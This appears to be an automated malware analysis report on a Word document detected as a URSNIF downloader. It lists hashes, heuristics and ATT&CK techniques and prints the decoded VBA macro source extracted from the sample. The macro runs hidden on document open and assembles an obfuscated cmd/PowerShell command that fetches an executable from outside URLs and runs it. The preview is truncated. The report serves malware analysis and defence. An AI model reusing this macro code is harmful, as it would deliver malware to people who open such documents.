Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bcbc0cd6cdbba896…

MALICIOUS

Office (OLE)

61.1 KB Created: 2018-09-06 14:16:00 Authoring application: Microsoft Office Word First seen: 2018-10-07
MD5: 8a1416f4261015e9e4437c91b605f882 SHA-1: 5bbd2c01917cb64f610bc347a84114443e8b5dcf SHA-256: bcbc0cd6cdbba896384d2c13a3e9697b1e22261d44758632cbb0a389792ea1cd
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The critical 'OLE_VBA_SHELL' heuristic indicates the use of the Shell() function, and the 'Document_Open' macro is present, suggesting automatic execution upon opening. The ClamAV detection as 'Doc.Downloader.URSNIF-6729855-3' strongly suggests a downloader family. The VBA macro attempts to execute a command via Shell(), likely to download and run a secondary payload.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4983 bytes
SHA-256: f693e36e4f41b2acd6ce31ecc79a3d711780060c58b49575dde7ceffd0d0c2c5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "QUnktJjln"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Shell Format(waNduAX) + znFsvREjii + WzdlNlnE + ZdCPiOUZh + UhkpqBCO + RcTPzdwwBEhWvZ + SqQYUHS, vbHide
End Sub



Attribute VB_Name = "bakrjOjTKBW"
Function ZdCPiOUZh()

On _
Error _
Resume _
Next
Month "jzTRtsiMSF" + "1709"
   Month "4469" + "MYBErR" + "EnQYSOza" + "82242409"
   Month "KjiC" + "5275" + "C" + "a"
   Month "9602" + "11996652"
ELacoKUEbW = Chr(18 + 0 + 10 + 17 + 54) + "md /" + "V" + "^:^O" + "N/" + Chr(12 + 0 + 7 + 11 + 37) + Chr(5 + 0 + 3 + 5 + 21) + "^s^et ^" + "F^dH=^ " + "^  ^  " + "^    " + "^    ^ " + "^   ^}"
Month "39729721" + "AD" + "341231865" + "p"
   Month "vQaB" + "t" + "oI" + "Linwjqa"
   Month "EtNpLiIi" + "8281" + "MDEU" + "c"
   Month "zrk" + "E"
ddTNs = "}{" + "^h" + Chr(18 + 0 + 10 + 17 + 54) + "^ta" + Chr(18 + 0 + 10 + 17 + 54) + "}^;k" + "^aerb;" + Chr(18 + 0 + 10 + 17 + 54) + "u" + "l$ " + "^m^e" + "^tI^-e" + "k^ov" + "nI" + ";)" + Chr(18 + 0 + 10 + 17 + 54) + "^u"
Month "205" + "cFkZYvVJjp"
   Month "JcaC" + "211830277"
   Month "20" + "VpAZETYS"
   Month "9275" + "3648" + "LEVuSQwwH" + "482155827"
YdSDLh = "l$^ ^," + "K" + Chr(18 + 0 + 10 + 17 + 54) + "X^" + "$(" + "^" + "e^liF^d" + "a"
Month "G" + "iCXSoqvav" + "200890854" + "w"
   Month "5036" + "wCfuG"
   Month "133871181" + "O"
zMbTJE = "^" + "oln" + "^w^o" + "^D" + "^.^G^mQ" + "^${^yr" + "^t{)W^w" + "z$^ ni " + "K" + Chr(18 + 0 + 10 + 17 + 54) + "^X^$" + "(^h" + Chr(18 + 0 + 10 + 17 + 54) + "ae"
Month "16665454" + "mTdZoM"
SmZzH = "r^of;" + "^'" + "exe^" + ".'^+" + "^t^F" + "^f$" + "^+'\^'"
Month "ZorQ" + "229732073"
   Month "utzdsF" + "183023252" + "Mldt" + "B"
   Month "sMDiwAQL" + "NaTWM" + "SjKD" + "7193"
krFTwOdcj = "^+" + Chr(18 + 0 + 10 + 17 + 54) + "i" + "lb^u" + "^p:vne" + "^$=" + Chr(18 + 0 + 10 + 17 + 54) + "u^l" + "^$;'" + "^537^'^"
Month "1248" + "9968"
   Month "619" + "HoOQHfHFCw"
ddlfSWfj = " ^= ^t" + "F^f" + "$" + ";)" + "'^@" + "'(" + "^t^i^l" + "^pS^.^" + "'Pmi/m" + "o" + Chr(18 + 0 + 10 + 17 + 54) + ".s"
Month "LN" + "SW" + "YjhO" + "123700984"
GBnwjjbW = "^ira^p" + "^e^i" + "vn^e/" + "/:" + "^p^t" + "th@" + Chr(18 + 0 + 10 + 17 + 54) + "s^" + "K/mo" + Chr(18 + 0 + 10 + 17 + 54) + "." + Chr(18 + 0 + 10 + 17 + 54) + "n" + "is^o" + "^"
Month "hCCb" + "2118"
   Month "mt" + "tPNtO"
   Month "ppH" + "R"
wrTpCwwq = "i^d" + "^uts^a" + "^i^po^t" + "r" + "a//" + "^:ptt"
Month "z" + "181221366"
   Month "jsRL" + "1079"
naoAu = "^" + "h@E" + "6g^g/" + "^mo" + Chr(18 + 0 + 10 + 17 + 54) + "^.^" + "s^" + "kn^i^l" + "ea//^" + ":^p" + "t^t^h"
Month "21703089" + "RQuwYV" + "1901" + "7011"
   Month "JKSYT" + "KvCMSv" + "djzqsQ" + "IU"
   Month "2124017" + "317619582" + "6528" + "ILdrHfiInwnG"
VBRSzSJRw = "@q^f^" + "4^W/ln" + "^.dn" + "al^l^" + "oh^dr" + "o^onj" + "irv^t^" + "sag//:" + "pt^t^" + "h@^l/^t"
Month "ljPUBaCVtGk" + "ACzjNI"
   Month "LLBbqHv" + "361541911" + "8487" + "ZOpqbmhwubBl"
AaBjuL = "en^.tr" + "e" + "p^" + "x^e" + Chr(18 + 0 + 10 + 17 + 54) + "^" + "i//^:" + "pt^t" + "^h^" + "'=W" + "wz$^" + ";" + "tn^" + "eil" + Chr(12 + 0 + 7 + 11 + 37) + "^b^"
ZdCPiOUZh = ELacoKUEbW + ddTNs + YdSDLh + zMbTJE + SmZzH + krFTwOdcj + ddlfSWfj + GBnwjjbW + wrTpCwwq + naoAu + VBRSzSJRw + AaBjuL
   Month "472778122" + "XwTqq" + "rv" + "CRZ"
   Month "dtfMviQuCNU" + "llGfJmkdf"
   Month "5213" + "489661767"
End Function
Function UhkpqBCO()

On _
Error _
Resume _
Next
Month "Wi" + "coJMHT" + "z" + "GD"
   Month "BIGc" + "328"
   Month "8588" + "GBQc" + "7587" + "UGKGWI"
wlddbfYUXt = "eW^.t^e" + "N t" + Chr(18 + 0 + 10 + 17 + 54) + "e" + "j" + "^b^o" + "^" + "-w^"
Month "VIwBiCif" + "npol" + "R" + "rbwOhzR"
   Month "LoF" + "BNfiozZG" + "395872541" + "1327"
   Month "sDFhkMbN" + "n" + "9789" + "Vzu"
   Month "Pk" + "vWb
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.